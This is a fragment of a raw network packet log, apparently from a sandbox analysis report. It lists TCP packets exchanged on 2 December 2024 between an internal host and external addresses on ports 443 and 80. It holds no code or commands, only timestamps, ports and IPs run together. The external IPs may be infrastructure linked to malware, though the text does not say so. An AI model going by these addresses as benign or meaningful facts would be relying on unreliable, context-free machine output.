                                                  Dec 2, 2024 07:25:18.221581936 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.221596956 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.221601009 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.224814892 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.224823952 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.224872112 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.224879026 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.227423906 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.227461100 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.227505922 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.227513075 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.230148077 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.230178118 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.230205059 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.230212927 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.230263948 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.233426094 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.233436108 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.233490944 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.233498096 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.236028910 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.236088037 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.236093998 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.238723993 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.238785028 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.238791943 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.242105007 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.242165089 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.242172003 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.244726896 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.244787931 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.244796038 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.247695923 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.247760057 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.247766972 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.250343084 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.250403881 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.250411034 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.253928900 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.253993034 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.253999949 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.256345034 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.256405115 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.256411076 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.337868929 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:18.408215046 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.408349037 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.408365011 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.410814047 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.410824060 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.410844088 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.410876036 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.410883904 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.410932064 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.420034885 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.420044899 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.420067072 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.420201063 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.422791004 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.422801018 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.422821045 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.422847033 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.422858000 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.426011086 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.426027060 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.426049948 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.426064968 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.426078081 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.429322004 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.429330111 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.429383039 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.429389000 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.431859970 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.431884050 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.431910038 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.431916952 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.431956053 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.435255051 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.435264111 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.435318947 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.435324907 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.437628031 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.437688112 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.437695026 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.440722942 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.440783024 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.440788984 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.443321943 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.443382978 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.443392992 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.445931911 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.445991039 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.446002960 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.449196100 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.449254990 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.449263096 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.451647043 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.451708078 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.451714993 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.455385923 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.455450058 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.455456018 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.457648039 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.457710981 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.457717896 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.609461069 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.609574080 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.609586000 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.612827063 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.612837076 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.612858057 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.612885952 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.612895966 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.612941980 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.612946987 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.621412039 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.621421099 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.621464968 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.621570110 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.621599913 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.624387026 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.624402046 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.624424934 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.624449968 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.624460936 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.624507904 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.627420902 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.627430916 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.627449036 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.627477884 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.627490997 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.629905939 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.629914045 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.629956961 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.629966974 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.632497072 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.632504940 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.632555008 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.632570028 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.635931015 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.635938883 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.635987997 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.635994911 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.638922930 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.638952971 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.638978004 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.638987064 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.639038086 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.641998053 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.642007113 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.642067909 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.642076969 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.644840956 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.644903898 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.644912958 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.648056984 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.648118019 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.648123980 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.650321960 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.650372982 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.650386095 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.652909994 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.652976036 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.652990103 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.656254053 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.656316996 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.656325102 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.659260035 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.659338951 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.659347057 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.810609102 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.810709000 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.810736895 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.814007044 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.814016104 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.814033985 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.814085007 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.814099073 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.814146996 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.822788000 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.822796106 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.822819948 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.822845936 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.822879076 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.825984955 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.825997114 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.826011896 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.826039076 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.826061964 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.828588009 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.828596115 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.828655958 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.828665018 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.831625938 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.831633091 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.831682920 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.831691980 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.834620953 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.834629059 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.834681988 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.834696054 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.837255955 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.837285995 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.837308884 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.837317944 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.837364912 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.840770960 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.840779066 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.840830088 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.840837955 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.843307018 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.843368053 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.843374968 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.846102953 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.846163034 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.846170902 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.849344015 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.849400997 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.849410057 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.851778030 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.851834059 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.851841927 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.854954958 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.855026960 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.855036020 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.857656956 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.857722998 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.857733965 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.862816095 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.862910032 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.862925053 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.012597084 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.012702942 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.012720108 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.015055895 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.015063047 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.015081882 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.015120983 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.015130043 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.015177011 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.024482012 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.024491072 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.024516106 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.024561882 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.025202036 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.026988983 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.027003050 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.027017117 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.027054071 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.029222012 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.030291080 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.030298948 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.030323029 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.030347109 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.030364990 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.033466101 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.033473015 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.033502102 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.033543110 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.035561085 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.035573959 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.035593033 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.035595894 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.035604000 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.035612106 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.035623074 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.038935900 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.038943052 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.038997889 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.039009094 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.042567968 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.042577028 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.042639971 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.042649031 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.044641972 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.044675112 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.044701099 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.044714928 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.044764042 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.047657013 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.047666073 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.047730923 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.047739029 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.050357103 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.050440073 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.050451994 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.054069996 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.054125071 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.054136038 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.055821896 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.055876017 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.055882931 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.059247017 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.059315920 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.059322119 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.061861038 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.061914921 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.061922073 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.213675976 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.213836908 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.213856936 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.216701031 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.216708899 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.216747046 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.216770887 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.216801882 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.216845036 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.218854904 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.225625992 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.225635052 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.225657940 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.225675106 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.225684881 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.225693941 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.229144096 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.229151011 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.229173899 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.229193926 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.229204893 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.230886936 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.230900049 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.230921984 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.230928898 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.230942011 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.230958939 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.232110977 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.234405041 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.234412909 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.234460115 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.234467983 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.237117052 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.237129927 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.237184048 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.237193108 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.237703085 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.240382910 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.240391016 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.240441084 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:19.240447998 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:19.242902994 CET44349172142.215.209.77192.168.2.22
